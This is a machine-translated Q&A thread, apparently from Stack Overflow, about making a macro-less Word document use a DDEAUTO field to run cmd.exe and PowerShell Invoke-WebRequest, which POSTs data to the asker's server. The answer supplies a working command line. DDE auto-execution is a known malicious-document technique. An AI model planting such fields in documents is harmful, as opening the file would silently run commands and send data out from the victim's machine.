通过DDEAUTO MS Word发送发布数据

时间:2017-10-12 13:39:04

标签: windows powershell ms-word

我正在进行一些测试,并希望获得一个无宏的Word文档来ping回我的服务器。

我知道它是先通过有效负载完成的(参见https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/),但这里的目标不是运行任何东西而不是请求。

我的目标是运行以下内容:

Invoke-WebRequest -UseBasicParsing http://myip -ContentType "application/json" -Method POST -Body "{ 'Item':'word', 'id':1}"
来自DDEAUTO命令(https://msdn.microsoft.com/en-us/library/ff531181(v=office.12).aspx)的

我尝试通过cmd执行powershell,直接使用powershell,并且无法获得任何结果

我会期待以下内容:

DDEAUTO c:\\Windows\\System32\\cmd.exe "powershell -e Invoke-WebRequest -UseBasicParsing http://myip -ContentType "application/json" -Method POST -Body "{ 'Item':3661515, 'Name':'test'}"" \p

工作,但似乎并非如此。

谢谢!

1 个答案:

答案 0 :(得分:0)

你应该使用类似的东西,

/ k 将在命令行运行命令后保持打开状态。如果您希望cmd在命令

后自动关闭,请随意删除它

-command 指定命令

{} 哈希表无需将其放在引号中

{key:value; key:value} ; 是分隔符不是a,

cmd.exe "/k powershell -command Invoke-WebRequest -UseBasicParsing http://google.com -ContentType 'application/json' -Method POST -Body { Item:3661515; Name:'test'}"